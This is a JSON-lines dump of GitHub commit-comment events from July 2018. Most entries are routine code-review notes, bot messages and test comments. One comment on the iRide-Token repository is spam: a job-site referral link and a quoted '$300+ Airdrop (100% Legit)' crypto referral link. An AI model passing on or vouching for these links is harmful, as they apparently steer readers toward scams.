{"id":"8035323558","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29879111,"position":12,"line":1105,"path":"src/evdev-mt-touchpad.c","commit_id":"542391c1d6c02d645138c336ed2a7c15b9a2e549","created_at":"2018-07-30T03:42:16Z","updated_at":"2018-07-30T03:42:16Z","author_association":"NONE","body":"fwiw, the definition of major/minor is \"bigger\" and \"smaller\" already. So major > minor except in some exceptional circumstances where the ellipsis morphs or when you have an ellipse that wobbles being almost exactly a circle. major/minor are not aligned with any axis."}},"created_at":"2018-07-30T03:42:16Z"}
{"id":"8035331278","type":"CommitCommentEvent","actor":{"login":"zhu01111"},"repo":{"name":"zhu01111/Test"},"payload":{"comment":{"id":29879129,"position":14,"line":14,"path":"DemoJava.java","commit_id":"3b371d2975ade7193efd4a3d8d7bf06d0cf8a188","created_at":"2018-07-30T03:45:32Z","updated_at":"2018-07-30T03:45:32Z","author_association":"OWNER","body":"你自己的key"}},"created_at":"2018-07-30T03:45:32Z"}
{"id":"8035331691","type":"CommitCommentEvent","actor":{"login":"zhu01111"},"repo":{"name":"zhu01111/Test"},"payload":{"comment":{"id":29879131,"position":null,"line":null,"path":null,"commit_id":"3b371d2975ade7193efd4a3d8d7bf06d0cf8a188","created_at":"2018-07-30T03:45:42Z","updated_at":"2018-07-30T03:45:42Z","author_association":"OWNER","body":"心知天气"}},"created_at":"2018-07-30T03:45:42Z"}
{"id":"8035333136","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29879135,"position":13,"line":13,"path":"group/assignment6/CarRearrangmentService.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T03:46:20Z","updated_at":"2018-07-30T03:46:20Z","author_association":"COLLABORATOR","body":"Comment about algorithm in Slack"}},"created_at":"2018-07-30T03:46:20Z"}
{"id":"8035348106","type":"CommitCommentEvent","actor":{"login":"WhaleGirl"},"repo":{"name":"WhaleGirl/SelectPlatform"},"payload":{"comment":{"id":29879174,"position":null,"line":null,"path":null,"commit_id":"59f3688dedcbed1e7ab89f6a7483ac6d3506b35c","created_at":"2018-07-30T03:53:01Z","updated_at":"2018-07-30T03:53:01Z","author_association":"OWNER","body":"connectSql"}},"created_at":"2018-07-30T03:53:01Z"}
{"id":"8035348176","type":"CommitCommentEvent","actor":{"login":"rajivmucheli"},"repo":{"name":"sapcc/openstack-helm"},"payload":{"comment":{"id":29879175,"position":null,"line":null,"path":null,"commit_id":"60fe2707e10b5f75ad801f9388fa5c13fd018166","created_at":"2018-07-30T03:53:03Z","updated_at":"2018-07-30T03:53:03Z","author_association":"CONTRIBUTOR","body":"@thgrs the above works in openstack-helm, it fails in helm-charts (above changes are already added prior to the movement to helm-charts)."}},"created_at":"2018-07-30T03:53:03Z"}
{"id":"8035352799","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29879182,"position":null,"line":null,"path":null,"commit_id":"60b8e23d6576b15aea35a43a7c7be64002a9c565","created_at":"2018-07-30T03:55:08Z","updated_at":"2018-07-30T03:55:08Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-30T03:55:08Z"}
{"id":"8035374684","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29879250,"position":null,"line":null,"path":null,"commit_id":"0442aa5a31ee382517384ce289487f4a31e42192","created_at":"2018-07-30T04:04:55Z","updated_at":"2018-07-30T04:04:55Z","author_association":"MEMBER","body":"@RetroSven \r\n\r\nA couple of requests: can you make it so these errors go away? See below -\r\n\r\nmanagers/cheat_manager.c: In function 'cheat_manager_load_game_specific_cheats':\r\nmanagers/cheat_manager.c:571:4: warning: specified bound 4096 equals the size of the destination [-Wstringop-overflow=]\r\n    strncat(cheat_filename, settings->paths.path_cheat_database, max_length) ;\r\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nmanagers/cheat_manager.c: In function 'cheat_manager_save_game_specific_cheats':\r\nmanagers/cheat_manager.c:571:4: warning: specified bound 4096 equals the size of the destination [-Wstringop-overflow=]\r\n    strncat(cheat_filename, settings->paths.path_cheat_database, max_length) ;\r\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"}},"created_at":"2018-07-30T04:04:55Z"}
{"id":"8035375438","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29879252,"position":null,"line":null,"path":null,"commit_id":"0442aa5a31ee382517384ce289487f4a31e42192","created_at":"2018-07-30T04:05:15Z","updated_at":"2018-07-30T04:05:15Z","author_association":"MEMBER","body":"Also, I would prefer if you could replace the strncat references with strlcat instead and use that from now on. Hopefully that can be done as well."}},"created_at":"2018-07-30T04:05:15Z"}
{"id":"8035377009","type":"CommitCommentEvent","actor":{"login":"proudtxn"},"repo":{"name":"proudtxn/Collections-Loops-in-Java"},"payload":{"comment":{"id":29879253,"position":null,"line":null,"path":null,"commit_id":"1702ebea95ba3cdc89eaa4261fd3cc54822c4952","created_at":"2018-07-30T04:05:59Z","updated_at":"2018-07-30T04:05:59Z","author_association":"OWNER","body":"Initial code"}},"created_at":"2018-07-30T04:05:59Z"}
{"id":"8035381896","type":"CommitCommentEvent","actor":{"login":"kyoshizaki"},"repo":{"name":"isboj/joho-system-ror"},"payload":{"comment":{"id":29879284,"position":5,"line":3,"path":"app/views/posts/_signin.html.erb","commit_id":"f32d94e96cc8582e6e39f4a827f0f73ac558b6b3","created_at":"2018-07-30T04:08:13Z","updated_at":"2018-07-30T04:08:13Z","author_association":"COLLABORATOR","body":"表示するのは、signin_nameではなくdisplay_nameですよ。"}},"created_at":"2018-07-30T04:08:13Z"}
{"id":"8035381926","type":"CommitCommentEvent","actor":{"login":"dsmiley"},"repo":{"name":"arafalov/solr-presentation-2018-may"},"payload":{"comment":{"id":29879285,"position":5,"line":5,"path":"configs/initial/solrconfig.xml","commit_id":"644bc5fb2da62b9bd70c6f4599dd55740c1ed2ec","created_at":"2018-07-30T04:08:13Z","updated_at":"2018-07-30T04:08:13Z","author_association":"NONE","body":"Hmm; I thought `/select` was auto registered, thus making this unnecessary?  (granted you are opting to add `df=_text_` which I can understand in a _learning schema_, though I avoid defining \"df\" in my apps."}},"created_at":"2018-07-30T04:08:13Z"}
{"id":"8035383222","type":"CommitCommentEvent","actor":{"login":"TheLabyrinthMind101"},"repo":{"name":"TheLabyrinthMind101/thelabyrinthmind101.github.io"},"payload":{"comment":{"id":29879289,"position":null,"line":null,"path":null,"commit_id":"602e5ba7f6ce4f145e489f235ae3bb60c08c1495","created_at":"2018-07-30T04:08:50Z","updated_at":"2018-07-30T04:08:50Z","author_association":"OWNER","body":"Can I make changes to the site by adding a theme?"}},"created_at":"2018-07-30T04:08:50Z"}
{"id":"8035386902","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29879298,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T04:10:30Z","updated_at":"2018-07-30T04:10:30Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T04:10:30Z"}
{"id":"8035388179","type":"CommitCommentEvent","actor":{"login":"TheLabyrinthMind101"},"repo":{"name":"TheLabyrinthMind101/thelabyrinthmind101.github.io"},"payload":{"comment":{"id":29879304,"position":null,"line":null,"path":null,"commit_id":"602e5ba7f6ce4f145e489f235ae3bb60c08c1495","created_at":"2018-07-30T04:11:05Z","updated_at":"2018-07-30T04:11:05Z","author_association":"OWNER","body":"How about more changes?"}},"created_at":"2018-07-30T04:11:05Z"}
{"id":"8035390377","type":"CommitCommentEvent","actor":{"login":"karansangha"},"repo":{"name":"guardianz95/NotesApp_iOSTutorial"},"payload":{"comment":{"id":29879312,"position":null,"line":null,"path":null,"commit_id":"96c4704d4bd53342710e124d142a03ef810b35e3","created_at":"2018-07-30T04:12:09Z","updated_at":"2018-07-30T04:12:09Z","author_association":"NONE","body":"🔥 🔥 "}},"created_at":"2018-07-30T04:12:09Z"}
{"id":"8035390640","type":"CommitCommentEvent","actor":{"login":"faribujang"},"repo":{"name":"jackyzha0/vybe"},"payload":{"comment":{"id":29879314,"position":9,"line":9,"path":"audio record.py","commit_id":"246e370b81cd1c7a4ace36a57855e0d082760db7","created_at":"2018-07-30T04:12:16Z","updated_at":"2018-07-30T04:12:16Z","author_association":"COLLABORATOR","body":"any directory"}},"created_at":"2018-07-30T04:12:16Z"}
{"id":"8035391257","type":"CommitCommentEvent","actor":{"login":"gderiyenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29879317,"position":null,"line":null,"path":null,"commit_id":"9b869b97d2fc90a834fa53e99dcdebc6436454a1","created_at":"2018-07-30T04:12:32Z","updated_at":"2018-07-30T04:12:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Press \"Change\" button then comes confirmation popup window that says: \"Your password is changed\". This popup shoud be only for 2 seconds then it disappear. And then it should take you back to  Mane page.](https://trello.com/c/9roWzrNf/7-press-change-button-then-comes-confirmation-popup-window-that-says-your-password-is-changed-this-popup-shoud-be-only-for-2-secon)"}},"created_at":"2018-07-30T04:12:32Z"}
{"id":"8035393862","type":"CommitCommentEvent","actor":{"login":"TheLabyrinthMind101"},"repo":{"name":"TheLabyrinthMind101/thelabyrinthmind101.github.io"},"payload":{"comment":{"id":29879329,"position":null,"line":null,"path":null,"commit_id":"c9e4e5e4f53f434353e8af99ac9f93b369d487cb","created_at":"2018-07-30T04:13:47Z","updated_at":"2018-07-30T04:13:47Z","author_association":"OWNER","body":"Try again"}},"created_at":"2018-07-30T04:13:47Z"}
{"id":"8035394996","type":"CommitCommentEvent","actor":{"login":"w0709"},"repo":{"name":"w0709/tw_assisment"},"payload":{"comment":{"id":29879335,"position":null,"line":null,"path":null,"commit_id":"0f33a4f5ca1163a318c586d3faf8ca4aa8c82d82","created_at":"2018-07-30T04:14:19Z","updated_at":"2018-07-30T04:14:19Z","author_association":"OWNER","body":"thoughtworks作业"}},"created_at":"2018-07-30T04:14:19Z"}
{"id":"8035396280","type":"CommitCommentEvent","actor":{"login":"hoangthan"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29879336,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T04:14:55Z","updated_at":"2018-07-30T04:14:55Z","author_association":"NONE","body":"So, instead of using foreach to handle, I can use c=> c.id ==id to traverse the list, right ?"}},"created_at":"2018-07-30T04:14:55Z"}
{"id":"8035396857","type":"CommitCommentEvent","actor":{"login":"gderiyenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29879339,"position":null,"line":null,"path":null,"commit_id":"94502f5d310b5431c774c27a7eb3c4ca3f1854ed","created_at":"2018-07-30T04:15:12Z","updated_at":"2018-07-30T04:15:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [On the main page right corner should be login button. Case person all ready have user. When person is loged in then login button should change to a personal name. So user sees that  he/she is loged in.  shouled come a list box under it. So person can choose links between: Personal Data, Change Password, Log Out.](https://trello.com/c/Ia5w6Rxw/8-on-the-main-page-right-corner-should-be-login-button-case-person-all-ready-have-user-when-person-is-loged-in-then-login-button-s)"}},"created_at":"2018-07-30T04:15:12Z"}
{"id":"8035398215","type":"CommitCommentEvent","actor":{"login":"skewty"},"repo":{"name":"marcelklehr/floccus"},"payload":{"comment":{"id":29879343,"position":19,"line":17,"path":"src/lib/Tree.js","commit_id":"c55d52658e37eabc5a2276d003ea2253cdac2d31","created_at":"2018-07-30T04:15:49Z","updated_at":"2018-07-30T04:15:49Z","author_association":"NONE","body":"Why is this not `await this.markDirty()` or better still, why is `markDirty()` method marked as being **async**?"}},"created_at":"2018-07-30T04:15:49Z"}
{"id":"8035399388","type":"CommitCommentEvent","actor":{"login":"gderiyenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29879345,"position":null,"line":null,"path":null,"commit_id":"0d0cad58821dd1df47b22b4f8aacf4b37d2f8e50","created_at":"2018-07-30T04:16:21Z","updated_at":"2018-07-30T04:16:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Now all these windows disain should be similar to the Main page disain.](https://trello.com/c/FWJmucDt/9-now-all-these-windows-disain-should-be-similar-to-the-main-page-disain)"}},"created_at":"2018-07-30T04:16:21Z"}
{"id":"8035405621","type":"CommitCommentEvent","actor":{"login":"gderiyenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29879362,"position":null,"line":null,"path":null,"commit_id":"1f0c40d6570cfb31b4345271e90558c2a9c2b3ea","created_at":"2018-07-30T04:19:14Z","updated_at":"2018-07-30T04:19:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Users need to upload CV files.  And after we need to see these CV's so we need them in the database. These files are going to be PDF and WORD documents.](https://trello.com/c/0VmdyaV4/10-users-need-to-upload-cv-files-and-after-we-need-to-see-these-cvs-so-we-need-them-in-the-database-these-files-are-going-to-be-pdf)"}},"created_at":"2018-07-30T04:19:14Z"}
{"id":"8035408471","type":"CommitCommentEvent","actor":{"login":"subash1979"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29879368,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T04:20:36Z","updated_at":"2018-07-30T04:20:36Z","author_association":"NONE","body":"hey check this\n\nhttp://weeklyjob.online/?userid=47847\n\nOn Mon, Jul 30, 2018 at 8:35 AM, sirathashimi <notifications@github.com>\nwrote:\n\n> $300+ Airdrop - https://www.avinoc.com/r/Xa4hvUactw9o (100% Legit)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29878900>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXRPnz9SJjVVHNtOCOTbcA9IzOPruSMrks5uLnfvgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-30T04:20:36Z"}
{"id":"8035411548","type":"CommitCommentEvent","actor":{"login":"greatmfy"},"repo":{"name":"greatmfy/hello-world2"},"payload":{"comment":{"id":29879373,"position":null,"line":null,"path":null,"commit_id":"4fd49084a183f13ec94fe7bd56b9db144e500e6c","created_at":"2018-07-30T04:22:02Z","updated_at":"2018-07-30T04:22:02Z","author_association":"OWNER","body":"sdfsdf"}},"created_at":"2018-07-30T04:22:02Z"}
{"id":"8035414907","type":"CommitCommentEvent","actor":{"login":"mcpa0003"},"repo":{"name":"mcpa0003/Hello-world"},"payload":{"comment":{"id":29879382,"position":null,"line":null,"path":null,"commit_id":"a67b177f9da9383e73a3b2e0183636fed3a69d62","created_at":"2018-07-30T04:23:34Z","updated_at":"2018-07-30T04:23:34Z","author_association":"OWNER","body":"not sure which one this is..."}},"created_at":"2018-07-30T04:23:34Z"}
{"id":"8035428334","type":"CommitCommentEvent","actor":{"login":"nicktime"},"repo":{"name":"javisar/ONI-Modloader"},"payload":{"comment":{"id":29879415,"position":39,"line":139,"path":"Source/Injector/Injector.cs","commit_id":"2b5c28a7f72f8de230775bb14b9781a8f799f56e","created_at":"2018-07-30T04:29:36Z","updated_at":"2018-07-30T04:29:36Z","author_association":"NONE","body":"Cool, thanks!"}},"created_at":"2018-07-30T04:29:36Z"}
{"id":"8035429499","type":"CommitCommentEvent","actor":{"login":"dkv8315"},"repo":{"name":"TechPlasma/SyntaxError-UTSA"},"payload":{"comment":{"id":29879419,"position":null,"line":null,"path":null,"commit_id":"5bd82f6041bf04df414c6f50c36807e3aa4502ed","created_at":"2018-07-30T04:30:08Z","updated_at":"2018-07-30T04:30:08Z","author_association":"COLLABORATOR","body":"I made separate Verify Form Functions depending upon what checkbox is checked and what the job status is. That way the user will not have to fill in every line of the form in order for it to be verified"}},"created_at":"2018-07-30T04:30:08Z"}
{"id":"8035430709","type":"CommitCommentEvent","actor":{"login":"RytoEX"},"repo":{"name":"obsproject/obs-browser"},"payload":{"comment":{"id":29879426,"position":null,"line":null,"path":null,"commit_id":"98fd1c211a01555b6a36a6edca23b585a957a74d","created_at":"2018-07-30T04:30:37Z","updated_at":"2018-07-30T04:30:37Z","author_association":"NONE","body":"Did you mean \"OSR\"?"}},"created_at":"2018-07-30T04:30:37Z"}
{"id":"8035432718","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29879437,"position":null,"line":null,"path":null,"commit_id":"27e0f1e422fade105ccc5f47a358b31d240098f0","created_at":"2018-07-30T04:31:30Z","updated_at":"2018-07-30T04:31:30Z","author_association":"COLLABORATOR","body":"Sorry, I meant to file an issue with repology, but didin't come to it, yet. We basically have a name collision here.\r\n\r\nThere's gle, the \"Tubing and Extrusion\" library which is needed by xscreensaver and it's at the version that I ported (http://www.linas.org/gle). And then there's GLE, the \"Graphics Layout Engine\" (http://www.gle-graphics.org) which is at 4.2.5. If I'm not mistaken, the two have nothing in common but the name."}},"created_at":"2018-07-30T04:31:30Z"}
{"id":"8035438634","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29879487,"position":null,"line":null,"path":null,"commit_id":"346ddff36cf3c7723aa8eed7af3c59a467960c4b","created_at":"2018-07-30T04:34:17Z","updated_at":"2018-07-30T04:34:17Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-443](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-443).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-443-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T04:34:17Z"}
{"id":"8035438662","type":"CommitCommentEvent","actor":{"login":"Goti88"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29879488,"position":4,"line":43,"path":"collections/programming-languages/index.md","commit_id":"020382dfa5fc2fa58745c64a6e8efdbcf169883b","created_at":"2018-07-30T04:34:17Z","updated_at":"2018-07-30T04:34:17Z","author_association":"NONE","body":"- dotnet/csharplang"}},"created_at":"2018-07-30T04:34:17Z"}
{"id":"8035445343","type":"CommitCommentEvent","actor":{"login":"kraileth"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29879505,"position":null,"line":null,"path":null,"commit_id":"27e0f1e422fade105ccc5f47a358b31d240098f0","created_at":"2018-07-30T04:37:26Z","updated_at":"2018-07-30T04:37:26Z","author_association":"COLLABORATOR","body":"Report is filed at repology."}},"created_at":"2018-07-30T04:37:26Z"}
{"id":"8035446709","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29879508,"position":1,"line":null,"path":"1532925479.85/github_test.txt","commit_id":"46910d437e2b71b41bbe8e13226824dc02c6061c","created_at":"2018-07-30T04:38:02Z","updated_at":"2018-07-30T04:38:02Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-30T04:38:02Z"}
{"id":"8035446905","type":"CommitCommentEvent","actor":{"login":"deshraj"},"repo":{"name":"Cloud-CV/EvalAI"},"payload":{"comment":{"id":29879512,"position":5,"line":289,"path":"scripts/workers/submission_worker.py","commit_id":"67af225d3395c6754100d2031a6b8cffd3c5bd50","created_at":"2018-07-30T04:38:07Z","updated_at":"2018-07-30T04:38:07Z","author_association":"MEMBER","body":"@isht3 can you please remove this line?"}},"created_at":"2018-07-30T04:38:07Z"}
{"id":"8035455389","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29879531,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T04:41:52Z","updated_at":"2018-07-30T04:41:52Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T04:41:52Z"}
{"id":"8035458366","type":"CommitCommentEvent","actor":{"login":"ssickles"},"repo":{"name":"husayt/axios-module"},"payload":{"comment":{"id":29879538,"position":null,"line":null,"path":null,"commit_id":"5718c1ebf293fa0fa7c634992157af4569d44d08","created_at":"2018-07-30T04:43:11Z","updated_at":"2018-07-30T04:43:11Z","author_association":"NONE","body":"@galpratama It looks like this has only been implemented in this forked version and this is not yet been adopted by the nuxt-community version. \r\n\r\n@husayt Have you submitted this as a PR for the nuxt-community version of this module? I like this way of incorporating apis into my projects as well."}},"created_at":"2018-07-30T04:43:11Z"}
{"id":"8035458986","type":"CommitCommentEvent","actor":{"login":"isht3"},"repo":{"name":"Cloud-CV/EvalAI"},"payload":{"comment":{"id":29879543,"position":5,"line":289,"path":"scripts/workers/submission_worker.py","commit_id":"67af225d3395c6754100d2031a6b8cffd3c5bd50","created_at":"2018-07-30T04:43:27Z","updated_at":"2018-07-30T04:43:27Z","author_association":"COLLABORATOR","body":"@deshraj Done."}},"created_at":"2018-07-30T04:43:27Z"}
{"id":"8035466763","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29879553,"position":null,"line":null,"path":null,"commit_id":"27e0f1e422fade105ccc5f47a358b31d240098f0","created_at":"2018-07-30T04:46:44Z","updated_at":"2018-07-30T04:46:44Z","author_association":"OWNER","body":"ah, ok.  that happens sometimes.  sorry!"}},"created_at":"2018-07-30T04:46:44Z"}
{"id":"8035471545","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29879579,"position":null,"line":null,"path":null,"commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-30T04:48:53Z","updated_at":"2018-07-30T04:48:53Z","author_association":"CONTRIBUTOR","body":"This file doesn't seem to get installed with a make install"}},"created_at":"2018-07-30T04:48:53Z"}
{"id":"8035471714","type":"CommitCommentEvent","actor":{"login":"manikanta6264"},"repo":{"name":"manikanta6264/first_App1"},"payload":{"comment":{"id":29879580,"position":null,"line":null,"path":null,"commit_id":"397a3962367644026622f3e31bd9ec205a2f541c","created_at":"2018-07-30T04:48:58Z","updated_at":"2018-07-30T04:48:58Z","author_association":"OWNER","body":"No need to create a new file"}},"created_at":"2018-07-30T04:48:58Z"}
{"id":"8035471821","type":"CommitCommentEvent","actor":{"login":"poserbiker"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29879581,"position":13,"line":13,"path":"sql/updates/world/2018_07_30_01_world.sql","commit_id":"32299b2d496f2b6a5062658d777d6afc717fd8a1","created_at":"2018-07-30T04:49:01Z","updated_at":"2018-07-30T04:49:01Z","author_association":"MEMBER","body":"DELETE FROM vehicle_template_accessory **WHERE** entry=62809;"}},"created_at":"2018-07-30T04:49:01Z"}
{"id":"8035487107","type":"CommitCommentEvent","actor":{"login":"thanhconguet214"},"repo":{"name":"thanhconguet214/Sample_test"},"payload":{"comment":{"id":29879619,"position":null,"line":null,"path":null,"commit_id":"462d75718d4e4b33bac3fdf985960c3a996764f4","created_at":"2018-07-30T04:55:49Z","updated_at":"2018-07-30T04:55:49Z","author_association":"OWNER","body":"ready"}},"created_at":"2018-07-30T04:55:49Z"}
{"id":"8035489225","type":"CommitCommentEvent","actor":{"login":"naseemas"},"repo":{"name":"naseemas/Folder1"},"payload":{"comment":{"id":29879627,"position":5,"line":5,"path":"README.md","commit_id":"2410e0c6eb187e2e95a208717cb0e931197e7172","created_at":"2018-07-30T04:56:48Z","updated_at":"2018-07-30T04:56:48Z","author_association":"OWNER","body":"apple\r\n"}},"created_at":"2018-07-30T04:56:48Z"}
{"id":"8035493866","type":"CommitCommentEvent","actor":{"login":"Sasaki-GG"},"repo":{"name":"sven-h/ontMatchingHobbit"},"payload":{"comment":{"id":29879640,"position":38,"line":101,"path":"pom.xml","commit_id":"5b8d5e5c00ec8f822e02832b0542123c7f38fb0a","created_at":"2018-07-30T04:58:52Z","updated_at":"2018-07-30T04:58:52Z","author_association":"NONE","body":"Is  SPIMBENCH API on HOBBIT  available?"}},"created_at":"2018-07-30T04:58:52Z"}
{"id":"8035502028","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"Exynos7580/android_kernel_samsung_a3xeltexx"},"payload":{"comment":{"id":29879674,"position":null,"line":null,"path":null,"commit_id":"8d7e2801c682752754d85d4031ca2779d095d00c","created_at":"2018-07-30T05:02:20Z","updated_at":"2018-07-30T05:02:20Z","author_association":"NONE","body":"This and next commit bad \r\nPhone does't boot for mee"}},"created_at":"2018-07-30T05:02:20Z"}
{"id":"8035509562","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29879697,"position":15,"line":11,"path":"Lesson_2/numbers_fibonachi.rb","commit_id":"8634aaafbbdd9107c0510a148aeba900104a0529","created_at":"2018-07-30T05:05:33Z","updated_at":"2018-07-30T05:05:33Z","author_association":"NONE","body":"вот когда у тебя появляются такие решения (добавление, а через строчку удаление) - всегда в них сомневайся и перепроверяй ))\r\nчтобы это исправить нужно немного изменить код\r\nв 4 строке `sum = 2`, что логично, потому что у тебя эта переменная должна быть равна сумме двух псоледних елементов (см. формулу в 7 строке)\r\nстроки 7 и 8 меняешь местами\r\nстоку 11 нужно удалить\r\nпосле этого код работает верно и в нем нет этой \"странной конструкции\"\r\n"}},"created_at":"2018-07-30T05:05:33Z"}
{"id":"8035510290","type":"CommitCommentEvent","actor":{"login":"Coreyml26"},"repo":{"name":"Coreyml26/hello_world"},"payload":{"comment":{"id":29879703,"position":null,"line":null,"path":null,"commit_id":"9fab6b9260e5da5028c59ec7f7b8a6172de707af","created_at":"2018-07-30T05:05:52Z","updated_at":"2018-07-30T05:05:52Z","author_association":"OWNER","body":"I wrote about myself in the readme file."}},"created_at":"2018-07-30T05:05:52Z"}
{"id":"8035514286","type":"CommitCommentEvent","actor":{"login":"RajkumarShivage"},"repo":{"name":"SungardAS/aws-services-onboarding"},"payload":{"comment":{"id":29879712,"position":5,"line":558,"path":"template.yaml","commit_id":"b83e74a48dadba28c752f61d354cd6c0bcd8ac95","created_at":"2018-07-30T05:07:37Z","updated_at":"2018-07-30T05:07:37Z","author_association":"NONE","body":"If this value is coming from API, make sure the appropriate changes are made at API level too."}},"created_at":"2018-07-30T05:07:37Z"}
{"id":"8035514612","type":"CommitCommentEvent","actor":{"login":"Coreyml26"},"repo":{"name":"Coreyml26/hello_world"},"payload":{"comment":{"id":29879714,"position":null,"line":null,"path":null,"commit_id":"f59fb81bb4d98a311de1a6cf03b067c3d58b6551","created_at":"2018-07-30T05:07:46Z","updated_at":"2018-07-30T05:07:46Z","author_association":"OWNER","body":"This is a comment saying I edited the readme file."}},"created_at":"2018-07-30T05:07:46Z"}
{"id":"8035515337","type":"CommitCommentEvent","actor":{"login":"ILikeTofuuJoe"},"repo":{"name":"ILikeTofuuJoe/helloworld"},"payload":{"comment":{"id":29879716,"position":null,"line":null,"path":null,"commit_id":"26b42290b57420c46ce7ef80c96bd47268ec2484","created_at":"2018-07-30T05:08:06Z","updated_at":"2018-07-30T05:08:06Z","author_association":"OWNER","body":"..."}},"created_at":"2018-07-30T05:08:06Z"}
{"id":"8035517215","type":"CommitCommentEvent","actor":{"login":"hyejin106"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29879719,"position":5,"line":64,"path":"main.cpp","commit_id":"002a76150aca77fcfacc7c2ba98c2a0673670b33","created_at":"2018-07-30T05:08:58Z","updated_at":"2018-07-30T05:08:58Z","author_association":"OWNER","body":"Done in https://github.com/hyejin106/pcap_test/commit/dd7c0a4a0643504e3c5308ed1790f4c59bcde594"}},"created_at":"2018-07-30T05:08:58Z"}
{"id":"8035519312","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29879723,"position":10,"line":10,"path":"Solutions6/HashMap.cs","commit_id":"10bfe601e52d887a8eb0584844e8a7f18a7980b6","created_at":"2018-07-30T05:09:57Z","updated_at":"2018-07-30T05:09:57Z","author_association":"NONE","body":"главное, что бы разобрался сам"}},"created_at":"2018-07-30T05:09:57Z"}
{"id":"8035524117","type":"CommitCommentEvent","actor":{"login":"Hasib155"},"repo":{"name":"Hasib155/Professional-Development"},"payload":{"comment":{"id":29879739,"position":null,"line":null,"path":null,"commit_id":"f259694df8e6ac8c4ffd1d18e09543743c836188","created_at":"2018-07-30T05:12:05Z","updated_at":"2018-07-30T05:12:05Z","author_association":"OWNER","body":"https://novoresume.com/a/image.hasib.1\r\nhttps://www.linkedin.com/in/hasib43/"}},"created_at":"2018-07-30T05:12:05Z"}
